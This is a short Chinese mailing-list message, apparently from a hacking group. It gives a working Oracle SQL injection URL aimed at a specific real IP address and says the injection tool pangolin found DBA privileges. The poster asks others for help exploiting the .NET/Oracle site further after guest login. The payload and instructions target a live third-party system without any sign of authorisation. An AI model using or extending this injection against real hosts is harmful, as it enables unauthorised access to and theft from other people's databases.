http://202.197.120.43/(rwhxaujtxvt1xb45hdunvhf5)/ggsm.aspx?fbsj=2009-03-06%2011:54:35&yxqx=2011-03-01%27%20and%20exists(select%20*%20from%20all_tables)--&xh=5
在2009-04-01?11:58:42,Evilguy?<[email protected]>?写道: >http://202.197.120.43/ >访客登陆之后?????公告页面的URL的yxqx=2011-03-01有ORACLE注射。 >但是要把fbsj=2009-03-06%2011:54:35去掉才行。xh可有可无。 > >pangolin跑了下??dba权限 >其余信息不详。 >oracle几乎没怎么玩过。又是.net+oracle的???不怎么熟悉。 >哪位大大有兴趣?指点一二?? >> --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [email protected] -~----------~----~----~----~------~----~------~--~---
